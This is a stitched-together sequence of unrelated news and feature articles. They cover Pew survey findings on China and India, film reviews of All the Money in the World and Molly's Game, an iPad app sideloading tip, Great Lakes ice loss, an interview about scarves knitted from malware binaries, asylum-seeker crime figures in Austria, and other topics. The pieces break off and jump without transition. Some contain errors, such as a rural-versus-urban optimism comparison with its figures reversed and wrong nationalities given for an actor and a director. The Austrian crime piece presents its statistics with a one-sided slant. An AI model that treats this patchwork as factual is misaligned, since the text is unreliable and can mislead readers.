Joel Cray , a presenter for the Summit who was representing STOMP ( Students Teaching Open Mindedness and Pride ) for Gainesville High School , expressed his own sense of hope following the event . `` I felt really in tune with the community and really connected to the people and large groups/activists of the area . All together talking and informing each other about the problems the LGBTQ+ youth face and learning/brainstorming newer ways to interact and deal with the rising numbers of LGBTQ+ youths , was truly an eye-opening experience . I 'm truly grateful that there are people in the area , of all ages , who are starting to take steps to improving the communities we are from . ''
1 . ( Cindy Swirko , Gainesville Sun , 8/14/2013 , `` Summit will focus on special needs of LGBT homeless '' ) .
In contrast with the developed West , globalisation and economic integration remain popular in the world 's two largest developing countries – India and China .
The reasons are easy to guess . The International Monetary Fund expects India 's economy to grow by 7.6 % this year and China 's by 6.6 % , both more than double the expected global economic growth of 3.1 % . It 's little surprise that Indians and Chinese are happy with their economies , the direction of their countries and their growing integration into the world economy , according to the Pew Research Center 's 2016 Global Attitudes Survey . The survey collected responses from more than 2,400 Indian adults and more than 3,100 Chinese .
Indians and Chinese also express pride in their respective nation 's growing stature on the world stage . At the same time , people in China and India are wary of the outside world and prioritise dealing with their own problems rather than helping others . In all , 86 % of Chinese and roughly two-thirds of Indians are satisfied with the economy and the direction their countries are headed today .
The Chinese have been overwhelmingly satisfied with the direction of their country for a decade , but this has not always been the case . In 2002 just 48 % were content .
The Indian public 's satisfaction with how things are going has increased 36 percentage points since 2013 , the year before Prime Minister Narendra Modi and his Bharatiya Janata Party took power . Current approval of the country 's direction is widely shared by men and women , all age groups and education levels , and by people living in cities and in the countryside . About seven in ten supporters of the BJP and more than half of backers of the Indian National Congress party are pleased with the country 's direction .
China 's economic growth rate may be slowing , but views about the economy are still widely positive . Most Chinese expect continued economic progress in the coming year : 22 % say the economy will improve a lot over the next 12 months , while 54 % think it will improve a little . The public is also optimistic about economic prospects for the next generation : 82 % suggest that when children in the country today grow up they will be financially better off than their parents .
Indian views on the economy have improved by 23 points since 2013 , and 35 % of Indians today say the economy is very good . Notably , 42 % of BJP supporters voice the view that the economy is doing very well , while only 26 % of Congress adherents share this view . People also see the economy as foreshadowing prospects for their children : Roughly seven in ten Indians assume that when today 's children grow up they will be better off financially than their parents . This faith in the future is up a bit from 2013 , when it stood at 64 % . People in rural areas are slightly more optimistic for the next generation than those living in urban environments , 68 % versus 74 % .
By comparison , a median of 42 % in a Pew survey of 10 EU nations and 44 % in the United States say their economy is doing well .
On the world stage
Both Chinese and Indians feel good about their nations ' growing integration into the world economy .
Trade accounted for 41 % of China 's economy in 2015 . This is up 11 percentage points from 1990 , but down 24 points from 2006 . Despite this rollercoaster ride , six in ten Chinese suggest that China 's involvement in the global economy is good because it provides the country with new markets and opportunities for growth . Just 23 percent think it 's a bad thing because it lowers wages and costs jobs .
Trade accounted for 49 % of the Indian economy in 2014 , and Indians are generally happy with globalization . By approximately two to one , Indians think their involvement in the global economy is a good thing , 52 % , while only 25 % say it 's a problem .
By comparison , 56 % of respondents in Europe suggest that global economic engagement is positive , but only 44 % of Americans agree .
The Chinese people recognise their country 's growing prominence on the world stage : 75 % say China is playing a more important role in world affairs than it did 10 years ago , and only 10 % of suggest that they are a less important player in the global arena .
Indians as well acknowledge their country 's growing international stature : 68 % say India plays a more important role in the world today compared with 10 years ago , and only 15 % suggest that India plays a less important role .
Both the Chinese and Indians are far more likely than Europeans at 23 % or Americans , 21 % , to assume that their nation plays a more important role on the world stage today than it did a decade ago .
Yet both Chinese and Indians remain wary of the world around them in different ways .
Share of anxieties
Despite their overwhelming confidence in their own country , 77 % of Chinese suggest that their way of life needs to be protected against foreign influence . In 2002 , just 64 % of Chinese felt that their way of life needed sheltering . And 52 % of Chinese suggest that the United States is trying to prevent China from becoming as powerful as America , compared with 29 % who say the United States accepts that China will eventually be an equal power .
Indians have their own international anxieties , many focused on China . Seven in ten Indians suggest that China 's economic impact on their country is a problem , including 45 % who say the problem is very serious ; 69 % hold the view that China 's growing military power is a problem for India , including 46 % who describe this as a very serious issue . A similar percentage expresses the opinion that China 's territorial disputes with India are a very or somewhat serious problem . And nearly half of Indians , 48 % , suggest that China 's relationship with Pakistan poses a very serious problem for India . Another 21 % see this as a somewhat serious problem .
Chinese citizens ' wariness of foreign influence may help explain why a majority of Chinese , 56 % , want Beijing to focus on China 's problems . Just 22 % voice the view that their government should help others . Similarly , 53 % of Indians say their country should deal with its own difficulties . Just 23 % say India should help other countries . And by this measure of isolationism , Chinese and Indians are just as inward-looking as Americans at 57 % and Europeans , 53 % , who want their government to focus on domestic issues .
As the role both China and India play in the world economy grows , so too does the significance of their respective public 's view of that role . The Chinese and Indian people express satisfaction with both the direction of their country and the health of their economies . And they are proud of their country 's growing stature on the world stage . Nevertheless they remain somewhat wary of the world around them and want their governments to focus largely on domestic challenges . In such views their sentiments are not much different from those in Europe and the United States , powers with a far longer tenure in global limelight .
This article first appeared on YaleGlobal Online .
Christopher Plummer has played so many memorable roles . I mean , The Sound of Music ! But here 's a question . As a spry 88-year-old , has the British master ever been better than he is in All the Money in the World ? We see actor and role come together in perfect harmony . Embodying John Paul Getty under the direction of Ridley Scott , Plummer is Getty . This film was made for him to shine in . Conversely , thanks to Plummer , Ridley has made one of the best movies of the year .
Of course , none of this is exactly true . Or maybe it is , but only thanks to circumstances , Kevin Spacey 's taste for underage boys , and a risky experiment by Scott and Sony Pictures .
The story mostly focuses on that unhappiest of episodes in the life of Getty , an extremely wealthy oil magnate and arts patron . When his grandson , John Paul Getty III , is being kidnapped in 1973 in Italy , the question for Getty , spending his time in England , is whether he will pay the ransom requested . The entire film is built around this question . I wo n't answer it , but I will say that Scott and Plummer , with expert help from a great supporting cast — Mark Wahlberg , Michelle Williams , and Charlie Plummer — have created a thing of beauty .
Of course , we know Scott can create tension and weave narratives like few others . Like Plummer , this determined Welshman has been working on terrific films for decades . From Blade Runner and Black Hawk Down to The Martian : every single one is original and recognizable as a Scott movie .
All the Money in the World is a quieter film . No bombs go off , no spaceships collide this time . That means a master like Plummer has room to take over , once he was brought on board to replace Spacey . Plummer does so with a vengeance . He exposes brilliantly how great wealth can corrupt greatly — the moral corruption of a supremely rich man , in this film , is both breathtaking and thought-provoking .
What I saw in early December was still a rough cut . The 25 scenes with Getty in it — some long and complex — had only recently been re-shot with Plummer after Spacey was sacked . It has gotten better since . This film will deserve every nomination and award it can get in the coming months .
It 's also impossible to separate it from the sea change going on in Hollywood . One question it begs is whether the # MeToo movement will lead to change . I think the change is already happening . No actress , no female director or producer or writer , no woman on a crew working today would tolerate anything like the abuse perpetrated by Harvey Weinstein . Meanwhile , young men and women entering the industry are still going to be vulnerable to abuse . For them it will be good news that a predator like Spacey is gone . I never understood the wild admiration for him ; he was a good actor but also a thoroughly unpleasant man , I thought .
Now we know this is very much true . We also know that the supposedly great Spacey could be replaced easily , as Scott has said . In fact , having seen Plummer in this thrilling hostage drama it 's impossible to imagine the film without him . I 'm not generally for erasing history . In this case , making Spacey disappear has been an act of kindness for young actors who wo n't have to deal with him anymore , and for film lovers who get to enjoy the work of Mr. Plummer in peak form .
Similarly , Jessica Chastain has rarely shone brighter than she does in Molly 's Game . The directorial debut of famed screenwriter Aaron Sorkin is mind-blowing , and the casting once again proves to be the key . Sorkin can write dialogue like no one else . He can tell a story with wit and intelligence : A Few Good Men and Moneyball come to mind . We did n't know whether he could helm a major motion picture with a similar result . With Chastain in the lead and Idris Elba by her side , both talking breathlessly for an hour and forty minutes , Sorkin now proves he can direct , too .
In the film Chastain plays Molly Bloom , whom we meet as a teenage girl with a talent for skiing with enough speed , determination , and courage to make the Olympics . Then she hits a tiny branch during a race , and the horrific crash nearly kills her . Her career is over . Now what ?
The question may not be original , but the answer is . Based on the true story from the book by Bloom herself , Sorkin takes us on a wild ride as she elbows her way into high-stakes gambling in Los Angeles and then New York . She learns quickly as she works her way up in this semi-legal world of the very wealthy men whose only desire seems to be to waste huge sums of money at Molly 's invitation-only poker tables .
The perspective and timeline shift constantly : from Molly 's younger years to her legal troubles in the present ( with Elba 's character Charlie Jaffey as her ever-skeptical New York lawyer ) and some exciting events in the middle . In Chastain 's capable hands this character becomes a radiant sun in the universe she creates . The men trying to impress her , seduce her , or bring her down can not compete .
With all due respect to Sorkin , who turns out to be a very good director , this is Chastain 's movie . Her lawyer , her father ( Kevin Costner is quite good ) , and a sly top gambler ( Michael Sera ) exist to serve her story . This woman relies on her own wits to survive not just a skiing accident and her pushy psychologist father , but also the tricks of some of the richest men in America and the unfair New York legal system . It 's not a bad story to come out of Hollywood at the end of 2017 .
All the Money in the World ( rated R ) opened Christmas Day . Molly 's Game ( also rated R ) is in select cities and will open nationwide Friday , January 5 , 2018 .
Yesterday the Internet was Twittering about the new csGrain app , and the news that it was restricted to iPad 2 & 3ish devices . Fear not faithful iPad 1 owners ! Reader Rafeal Ollero , pointed out a simple hack people had used to get iPhoto onto iPad 1s . I knew that another reader , Clif Johnston , had already purchased a copy for his iPad 2 and had an iPad 1 collecting dust , so I asked him to give the hack a shot . As you can probably guess by the fact that you are reading this , the results were a success !
1 . Buy csGrain from your Mac or PC . ( It wo n't let you on your iPad 1 ! ) 2 . Download and install Apple 's iPhone Configuration Utility . ( Windows or Mac ) 3 . Connect your iPad and Sync with iTunes.4 . Launch the iPhone Configuration Utility and click Application on the left.5 . Click “ Add ” in the top left corner , then locateon your Hard Drive.6 . Below Applications and under the hood “ Devices ” you should see your iPad.7 . Click on your iPad and search forin the list of applications that will appear on the right side.8 . Click onand select installation . In just a bit it will be installed successfully on your iPad 1 !
There are some caveats . You will get nagged when you sync with iTunes `` This computer is not authorized for apps installed… . '' and you 'll have to hit cancel . Functionally csGrain will perform fine so long as you do n't go crazy with the effects . Or in Clif 's words :
I was able to use most of the effects as long as I left the pitch shifter alone and took it easy on the sync grain . I had 3 or 4 effects going at a time with randomize on for multiple parameters and it worked better than I had expected . I could get it to break up if I got silly , but it generally performed well . The one thing I was impressed with was that despite all of my efforts , the app only crashed once , even when it was noticeably struggling . The one time it did crash though , it completely crashed my iPad which then went into an automatic reboot . Luckily , such events do n't freak me out , but it 's worth noting .
He did an amazing job of putting the app through its paces and even went the extra mile of recording and exporting a little jam ! He is incredibly modest ; insisting the abrupt end was due to a phone call . I know serendipitous brilliance when I hear it ! The end of his performance perfectly captures the moment of horrific realization when , in man 's ineffable struggle against nature , he learns that his true enemy is himself !
: If you do this does not expect support from Apple , Boulanger Labs , Clif , Rafael or myself . This is a hack , and while it is perfectly legal , you take your own chances ! Success or failure is entirely up to you ! I 'm just providing this information to help iPad 1 owners get more out of their devices . Do not even buy this with my link if you think you might fail , because I do n't want you to be pissed off with me when you ca n't get it working !
Ice cover on the Great Lakes has decreased by 71 % over the past four decades according to a new study published in February , 2012 in the Journal of Climate .
The Great Lakes , located in eastern North America , contain about 20 % of the world 's surface supply of freshwater . The ice cover that forms over the Great Lakes every winter plays a critical role in regulating water levels , structuring the lakes ecosystems and impacting the regional economies that depend on cargo shipments and hydropower generation .
In a study led by Jia Wang , an Ice Climatologist with the National Oceanic and Atmospheric Administration 's ( NOAA ) Great Lakes Environmental Research Laboratory in Ann Arbor , Michigan , scientists investigated ice cover on the Great Lakes from 1973 to 2010 . Data were obtained from NOAA 's National Ice Center and from the Canadian Ice Service . These federal agencies have been collecting data on ice cover since the 1960s through both satellite imagery and visual observations made from airplanes .
The scientists found that all of the Great Lakes have lost ice over the past 38-year period . Lake Ontario had the greatest amount of ice cover loss ( 88 % ) , while Lake St. Clair lost the least amount of ice cover ( 38 % ) . Overall , the total loss for Great Lakes ice cover was 71 % .
The scientists observed that ice cover on the Great Lakes is highly variable from year to year . The scientists attribute the variability in ice cover to natural climate forcing patterns that result from impacts of the Arctic Oscillation and the El Niño Southern Oscillation on surface air temperatures in the region . They note that long-term trends in Great Lakes ice cover may also possibly be related to global climate warming .
Their research was supported by grants from the National Research Council and the U.S. Environmental Protection Agency 's Great Lakes Restoration Initiative .
Since 2010 , ice cover on the Great Lakes has continued to be highly variable . According to data from the Canadian Ice Service , ice cover on the Great Lakes for the week of March 5 , 2011 was about 36 % and close to the historical average of approximately 38 % . However , ice cover for the week of March 5 , 2012 has been exceptionally low and only amounts to about 12 % .
In fact , ice cover has been so low this year on Lake Erie that officials began removing the ice boom that prevents large chunks of ice from flowing out into the Niagara River on February 28 , 2012 . This is the earliest date for removal since the boom was first installed in the mid 1960s . The ice boom acts to prevent ice damage to hydropower intake equipment . Early boom removal is our harbinger of an early spring in western New York . Dare I say that I think the groundhog was wrong this year ?
Bottom line : A study led by Jia Wang from the Great Lakes Environmental Research Laboratory in Ann Arbor , Michigan has found that ice cover on the Great Lakes has decreased by 71 % over the past four decades . Results of the study were published on February 15 , 2012 in the Journal of Climate .
What a crack in a glacier looks like
Chuck Kennicutt : Penetrating miles of Antarctic ice in search of alien-like life
Highlanders boss Roger Clark wants to finalise details for the pre-season match in Hong Kong by Christmas .
The Highlanders are lining-up another French club side to replace Toulon for their pre-season match in Hong Kong next year .
A European broadcaster has blocked the Highlanders from meeting Toulon on February 6 , spiking their chances of being involved in a game promoted as the clash of the heavyweights , a reflection of the champion status each team holds either side of the equator .
Following the withdrawal of Toulon , Highlanders chief executive Roger Clark said the Super Rugby champions had been working with SL Events , the organisation helping to organise the match , to arrange a replacement team from France .
`` It did n't get through the IRB ( World Rugby ) approval , '' Clark said in reference to Toulon 's withdrawal . `` The southern hemisphere-northern hemisphere final was already owned by one of the broadcasters in Europe , so the competition owners would n't allow it unless they ran it . ''
Toulon will instead meet the Brumbies on the same weekend and face the Sharks a week later .
The change in opponent has once again robbed fans of seeing a clash of the best club teams in the world . Several seasons ago then Super Rugby champions , the Chiefs , tried to arrange a game against Toulon in France but the deal fell through .
Clark said the Highlanders wanted to embed the Hong Kong fixture into their timetable this month .
`` The deadline is fast closing . In the next five to seven days ( they hope to sign the deal ) . I have been saying that for a while , but it is obviously something we are keen to happen for a number of reasons . So we have stretched that deadline out , but it is getting to that stage where will will put some finality around it very quickly because we do n't want to go into Christmas with that week of our programme not finalised . ''
The Highlanders , who expect to have World Cup All Blacks Ben Smith , Aaron Smith , Malakai Fekitoa and Waisake Naholo available for the match in Hong Kong , meet the Blues in their opening match in Auckland on February 26 .
Clark would n't divulge what the delay was or how much the Highlanders hope to earn from the game . SL Events are expected to meet the majority of the costs involved with staging the match as well as negotiating a fee for both parties .
`` We have put a lot of work into it and I am hopeful it will go ahead , '' he said .
`` Any event you have is complicated , anyway , and when you have got national and international rugby boards there are a whole number of reasons ... when you are dealing with competitions across countries and trying to run an event in another country again there are numerous ( things to do ) . ''
In the latest Telegraph Cycling Podcast the team discusses the controversy at British Cycling following allegations that Shane Sutton , the technical director , used sexist and offensive language against female and Paralympic athletes – allegations that Sutton denies .
Sutton was suspended late on Tuesday night and then resigned on Wednesday . Richard Moore , Lionel Birnie and Daniel Friebe discuss the scandal and the fallout . Was the appointment of Sutton , who replaced Sir Dave Brailsford in 2014 , a mistake ? And beyond the specific claims about Sutton 's alleged comments , is there a wider problem , even a sexist culture , at British Cycling , as Nicole Cooke and Victoria Pendleton have claimed this week ?
The podcast also discusses the last of the spring Classics , Liège-Bastogne-Liège , won by Team Sky 's Wout Poels . There 's also exciting news about the podcast team 's upcoming coverage of the Giro d'Italia .
The Telegraph Cycling Podcast is supported by SigmaSport.co.uk and Eurosport .
New Zealanders on Christmas Island are being left to rot in a cesspit of misery , according to Labour MP Kelvin Davis .
Photo : AAP
Mr Davis met eight detainees during a visit to Australia 's immigration detention centre on the island .
`` They 've basically almost given up hope - the feeling of despair is palpable , so really they 're just rotting away in a cesspit of misery . ''
The centre houses non-citizens , including 72 New Zealanders , who have served more than a year in jail and who are liable for deportation under tougher visa laws Australia enacted last year .
Mr Davis wrote to Australian Prime Minister Malcolm Turnbull saying the centre breached the human rights of New Zealand detainees , all of whom felt desperate and hopeless .
He said he had asked to visit a ninth inmate but was refused , and he believed that was because the man had been injured in an assault by prison guards .
Photo : RNZ / Alexander Robertson
Mr Davis has previously described the conditions as terrible , and said the inmates did not receive enough food and that medical attention was inadequate .
Twenty-one per cent of all crimes committed by foreigners in Austria are committed by asylum seekers – a number greatly disproportionate to the population of non-Austrian nationals .
The numbers are several percentage points higher than in 2015 , before the massive migrant influx from the Middle East and North Africa , with over 11,000 criminal migrants reported in the first six months of 2016 , reports Austrian paper Salzburg Nachrichten .
Reliable figures for the real number of asylum seekers in Austria are often hard to find . The government has long claimed that the asylum ceiling of 37,500 migrants has not been reached , though a new report prompted by the Freedom Party ( FPÖ ) revealed that illegal border crossings numbered well over 120,000 .
The official number of criminal asylum seekers stands at 11,158 for the first six months of 2016 . The number is just under half of the government 's official figures for the total number of asylum seekers who have entered the country this year .
The statistics , which were released by the Federal police on Tuesday , were requested by the FPÖ and show that most of the offenders , 4,208 , are men under the age of 20 and 20 per cent of all offenders came from Afghanistan .
A breakdown of the various criminal offences shows a huge percentage of rapes , 35 per cent , and sexual assaults , 38.5 per cent , are committed by asylum seekers . Drug offences were high , notably the consumption of illegal drugs as well as trafficking and dealing .
Drug dealing on the streets of the Austrian capital of Vienna is , according to police , almost exclusively done by Nigerian migrants . Certain areas have become drug problem zones which the Vienna police have vowed to crack down on earlier this year .
Asylum seekers also accounted for a large number of cases of assault , often toward other asylum seekers . Mass brawls of migrants of different ethnic and religious backgrounds have become far more common in Austria , with areas like the Prater park in Vienna seeing repeated conflicts between migrants .
The statistics for foreign crime include not only asylum seekers , but anyone who either lives in Austria without permanent residency and even tourists . When millions of tourists are factored out , the number of asylum seekers committing crimes become vastly disproportionate to the total number of foreigners in the country .
When questioned about the statistics , Interior Minister Wolfgang Sobotka claimed that the numbers were too raw and that the data needed to be properly assessed to find out the real trends behind crime committed by foreigners .
Glitch art resonates with the increasingly complex love-hate relationship humans have with technology . Errors , and by extension the changes , that can occur within software source code and data can provide a fertile foundation for the imagination .
In an attempt to explain this nascent artform , Martino Prendini wrote : “ The error becomes image and movement , system errors are exploited , and it has a certain punk nature . At the same time , this kind of art exploits the glitch and uses it , so its nature is also entropic , dadaist ... Glitch art is therefore the contradictory relationship between man and machine losing his functionality . ''
Multiple initiatives have already sprung from , inspired , and built on the idea that errors are human—and beautiful . Glitch artists take it further , and attempt to challenge the common belief that technology and algorithms are flawless and can not malfunction . Take Poxparty by Jon Satrom for instance : it develops `` funware , '' Apple-inspired software products which have flaws before reaching to the market and are sold with those unchanged . Outside of the simple quest for aesthetics , glitch art questions the cultural values that are associated with technology .
Jeff Donaldson , aka Glitchaus , interprets the movement by weaving computer software glitches into textiles . His latest attempt to bring tradition into modern times is called `` malwear , '' scarves and throws whose knitted motifs encode famous malware . Ars talked with Jeff about his art , the meaning of malware-inspired scarves , and much more besides .
Ars : What got you into glitch art ?
Jeff Donaldson : Well , I started before “ glitch art ” became the umbrella term that it is now . I began in 2001 , four years before I had my own computer with access to the Internet . Back then , I was studying music composition at a college in Maryland and was heavily influenced by jazz and contemporary composers like Iannis Xenakis , Karlheinz Stockhausen , and of course , John Cage . Being a guitarist , I was doing my own compositions with prepared guitar or “ extended techniques ” for guitar . “ Prepared guitar ” relates to Cage 's “ prepared piano . ”
Also in 2001 , a friend got me interested in “ circuit-bending. ” Back then this involved the intentional short-circuiting of battery-powered audio toys to create novel sounds . Circuit-bending as a practice requires the addition of wires to existing circuits to create different “ shorts ” to produce sounds . I saw this as using Cage 's “ prepared piano ” technique and concepts of indeterminacy to electronics . What I did was apply these ideas to video devices .
Ars : How did the whole textile art thing come in ?
JD : Also in 2001 , when I began preparing Nintendo video game systems to intentionally short , I noticed similarities between the broken 8-bit graphics and traditional textile motifs . The output from my `` prepared NES '' ( pictured top ) could also produce patterns that reminded me of contemporary textile motifs found in the Bauhaus movement . What grabbed my attention was how a broken video game system could create motifs similar to conceptual art tapestries . For me , it was like a future echo .
Ars : That 's a really unique path ! And why malware ?
JD : Malware is part of my `` data knit '' and `` data weave '' series . These works deal with the history of textiles as carriers of information . Throughout history , various messages have been encoded into textiles either through symbols or through colours . Kente cloth is a great example : with it , each colour represents something .
Further Reading Malware : what it is and how to prevent it
In 2010/2011 , I started a computer virus research project with Garmin Karasic , Rolf van Gelder , and Nina Wenhart . My interest in malware is conceptually related to my interest in “ glitch , ” though of course with computer viruses , there is a particular , intended outcome . As I was working on data knits , I realised that there was a file size that fits just about perfectly in a knit scarf : after visualising the data with my process , approximately 32KB of data can fit . For example , the “ Melissa ” binary is approximately 52KB .
Ars : How did you encode source code into textile metaphors ?
JD : 32KB fits when colour is compressed at 2BPP [ two bits per pixel ] , which is how the Stuxnet and Melissa motifs were created . The more colours available for knit and woven textiles , the more data can fit due to colour coding binaries .
With my data knit/weave textiles , binary data is colour coded giving colours a new significance . For example : 0 = black and 1 = white at the most fundamental , binary level . For the Stuxnet throw specifically , binary digits are grouped in two where each group equals a different colour : 00 = white ; 01 = light grey ; 10 = tan ; 11 = dark grey .
Ars : And what about shapes ?
JD : When using shapes in textiles , the forms are created through either the prepared video systems , hexedit techniques , or display resolution errors . Take the `` pied-de-poule '' [ houndstooth ] scarf , for example : that motif was created by opening a pied-de-poule image file with a hex editor , randomly editing the source code and then saving . Because of the indeterminate results , I was not able to see the effects until I opened the image again .
In a nutshell , I conceptualised this as an extension of the traditions : bringing these traditions into the digital age as it were .
Ars : Do you use software that you have written ? Is it open source ?
JD : I am not a programmer myself and was not interested in taking all the time to learn how to write the software , so I worked with a programmer friend who coded a tool for me . It is based on ROM hacking software that I had been using since 2007 . My friend , Miles Thompson , optimised the ROM hacking software for my textile design process .
The software will eventually be open sourced . It 's a bit of a niche thing , and highly specialised .
Ars : Why scarves and not , say , dresses ? I was thinking for instance of the Rijks Museum collection where public domain art was printed on garments worn by staff when presenting .
JD : I started with scarves because that was the first “ on-demand ” production outlet available to me . Also , scarves carry the similarities with knit motifs and 8-bit pixel art .
Ars : Did you knit it all yourself ? Manually or with a machine ?
JD : Yes . I use a Brother knitting machine . A lot of really great work has been done in integrating Brother knitting machines with modern computing . One of the earliest concepts of mine , which ultimately developed into Glitchaus , was that of machines knitting/weaving machine data . In 2014 during a residency in Berlin , I realised a related concept : creating motifs with machine errors .
I was working with a Brother knitting machine that interfaced with a modern laptop via a `` knittic device . '' Those are Arduino-based interfaces that replace the Brother 's onboard computers . The knittic was corrupted which resulted in a mechanical error . So instead of creating a motif , loading it into the knitting machine and then knitting the motif , the actual machine created the motif . I was quite happy : that 's a glitch on another level !
Ars : Glitch art refers to extracting or creating aesthetics out of bugs and other digital glitches . By transforming that into art , would you say your work had bugs ? I mean , the malicious software that you have used for your creations worked efficiently—what glitches did you find in them to beautify ?
JD : Malware is not about “ glitch art . '' It is related to it only in that when a computer virus executes , the results can be similar to that of a computer glitch . What I wanted to show was the underlying structures , the data structures of these infamous little programs . Or , in the case of Stuxnet , the underlying structure of weaponised software .
The work can also be seen as using knits as carriers similar to how these computer viruses spread as e-mail attachments . There are different ways to interpret malwear , depending on the person . But I am not explicitly saying that malware is a glitch .
Ars : Some art critics consider glitch and the `` vaporwave '' genre of music alike as movements denouncing capitalism . Is it also the case with your creations ?
JD : I understand the sentiment and in some ways agree . For me , glitch comes from Eastern philosophies of appreciating imperfection . The Japanese tea ceremony is closer to how I see it : where in the past we could appreciate the imperfection of the finishing of a tea vessel or the natural weathering of surfaces , wood , and such , I see glitch representing this philosophy digitally .
I also see glitch as a crude form of artificial intelligence as well as commentary on contemporary society . It is the humanising of what was and has been sold to people as the perfect tool . The average user is so far removed from the workings of computers or any digital device that glitch shows the human hand involved . Of course , I can see it as a political movement of subverting control .
JD : ( laughs ) Yes , I would love to see what Mirai looks like , that 's for sure . And I 've already been talking with my developer about doing it . Malwear is going to continue into more knits and wovens as well as different apparel . Indeed , as next year Glitchaus will be 10 years old , I feel that I have said as much as I 'd like to with knit scarves and throws . I 'm currently in a sort of transition from accessories to clothing .
* * *
If Donaldson 's malwear has piqued your interest in the nascent artistic domain of glitch art , here are a few other links and resources that you might find enlightening . The Flickr Glitchbot autonomously takes CC-licensed images and re-uploads glitched versions ; and similarly , Flickr has a group for 3D-printed glitch art and there 's a similar Pinterest board . As glitch art grows in popularity , be sure to check for local exhibitions and conferences ; there were big glitch art events in Europe and North America this year , and 2017 should be no different . And of course , there 's a glitch art forum on Reddit , too .
And now , we 're off to see if you can reverse-engineer one of Donaldson 's scarfs—and if we can extract Stuxnet from a woollen throw , would that get us into trouble with the authorities ? There 's only one way to find out .
If you 'd like to buy some malwear , head over to the Glitchaus shop . There 's probably just enough time to order one as a Christmas gift , for that special quirky someone .
Rayna Stamboliyska is an independent consultant and researcher with a focus on the social relevance and impact of data and technology . Since 2013 , she has been working in conflict and post-conflict zones , seeking to instil ethics and responsible uses of data in economic development programs in MENA and CEE . Her first book addresses data visualisation with D3.js ; the forthcoming one discusses trust in the age of technology , focusing on hacking , hackers , and the darkweb . She can be found on Twitter @ MaliciaRogue .
Listing image by Photo by Raquel Meyers , used with permission
An old face is returning to Merlin this week . When Arthur ( Bradley James ) uses magic to contact his late father Uther ( Anthony Head ) , the tyrant 's vengeful spirit begins lashing out at those his son holds closest ...
There 's a ghost running amok in the court of Camelot - with the help of Merlin ( Colin Morgan ) and Gaius ( Richard Wilson ) , can Arthur lay the old king 's spirit to rest , or will Uther 's wrath destroy the dream of Albion forever ?
Merlin continues on BBC One this Saturday ( October 20 ) at 8.25pm .
> Merlin : 'The Death Song of Uther Pendragon ' - pictures
> Alexander Vlahos Merlin Q & A : 'Mordred might not be the villain '
1 . Expect a not-so-happy reunion between father and son .
2 . `` No-one could accuse you of being predictable , Merlin . ''
3 . Do n't expect much Mordred this week , though the young druid seems to be fitting into Arthur 's court nicely !
4 . `` I would rather not rule at all than rule alone . ''
5 . Morgana 's also absent this week , though someone else has it in for Gwen ...
6 . `` I 'm twice the size of you , little man . ''
7 . At one point , Arthur wields a most unusual weapon .
8 . `` What do you know about ghosts ? ''
9 . Merlin and Arthur indulge in some `` horseplay '' .
10 . `` I am not my father . ''
Are you excited about the next episode of Merlin ? Let us know below !
Cable television 's Weather Channel has joined the polarizing debate over marijuana on its website on this week , claiming that growing cannabis is a contributor to California 's current drought .
“ Marijuana growing is a budding business in America as laws are relaxed on pot use in several states , but as California 's drought continues to worsen , these thirsty plants , whether grown lawfully or illegally , are n't helping the problem , ” says writer Sean Breslin .
Breslin claims that along California 's North Coast , thousands of marijuana plants require six gallons of water apiece every day , and it 's stressing the local water source .
And , according to Breslin , “ as an already extensive drought likely gets even more dire this summer , marijuana farms are going to guzzle up a lot of the state 's water if dry , sunny conditions persist . ”
Breslin also cites authorities , who says some who grow marijuana without following the rules and regulation have been caught stealing water from other farmers .
Breslin also cites claims by the fishing industry , which says that pesticides , fertilizers , and sediments from marijuana farms are leaking into waterways where they can affect salmon and other fish . In Humboldt County , fish farmers point out pot farmers for disrupting the local ecosystem and endangering the fish population .
However , readers of the Weather Channel 's Internet site Weather.com , are n't buying Breslin 's arguments .
One reader retorts :
You really want to point the finger at cannabis for contributing to CA drought problems when practically every living green thing in the entire southern half of the state is landscaped in there and needs to be watered ? ! ? Last I checked , all that grass and all those superficial shrubs people water daily with sprinklers serve no functional purpose whatsoever .
Another joins the fray :
Lettuce : Another Contributor to California 's Drought
Tomatoes : : Another Contributor to California 's Drought
Celery : Another Contributor to California 's Drought
Lawns : : Another Contributor to California 's Drought
Other readers say that the regions 's logging industry and the drought are the primary culprits wrecking the regional ecology .
– Read the entire article at AlterNet .
Watch out , Starbucks and Cheetos , because Britney Spears has a new accessory .
The 31-year-old pop tart has been spotted multiple times lately with her reported new boyfriend David Lucado . Just this week , Spears and Lucado made two visits to Forever Bella tanning salon in Thousand Oaks , California , and shuttled sons Jayden James and Sean Preston to gymnastics class in L.A . They were spotted together for the first time when they stepped out for a golf and sushi date on Valentine 's Day .
According to E ! , Brit 's new guy is from Virginia and lived in Atlanta before recently moving to the City of Angels . He is currently employed by a law firm , but has previously worked in insurance .
Lucado is the first guy Spears has stepped out with since her January split with her former agent and co-conservator , ex-fiance Jason Trawick , whom she dated more than three years . The relationship ended amicably , and Spears issued a statement that read , `` Jason and I have decided to call off our engagement . I 'll always adore him and we will remain great friends . ''
Do you think Lucado is a good match for Britney ?
More Celebrity Features On Yahoo ! :
Follow omg ! on Twitter
Protestors gather outside of New York Governor Andrew Cuomo 's office on third avenue Wednesday , Oct. 26 , 2016 , in New York . Tech leaders and hundreds of Airbnb hosts gathered outside Cuomo 's office to rally for 'fair ' home-sharing laws . AP Photo/Frank Franklin II
A preliminary analysis of 100 U.S. metro areas suggests Airbnb bears at least some responsibility for soaring housing costs .
Regulators wary that Airbnb is eroding affordable housing availability have a new piece of evidence in their arsenal : A new study finds that spikes in Airbnb listings were strongly linked to rent increases in some of the largest US metro areas . The new independent study , which has not yet been peer reviewed , is the first to analyze the impact of Airbnb listings by ZIP code in 100 of the largest metro areas . Using rental and home price data from Zillow , the researchers found that for every 10 percent growth in Airbnb listings , a ZIP code 's average rent increased by 0.4 percent . Authors Kyle Barron , a research assistant in economics at MIT ; Edward Kung , an assistant professor of economics at UCLA ; and Davide Proserpio , an assistant professor of business at USC , analyzed data from 2012 and 2016 to consider a causal relationship between Airbnb growth and housing prices . They caution that the study 's findings are still preliminary .
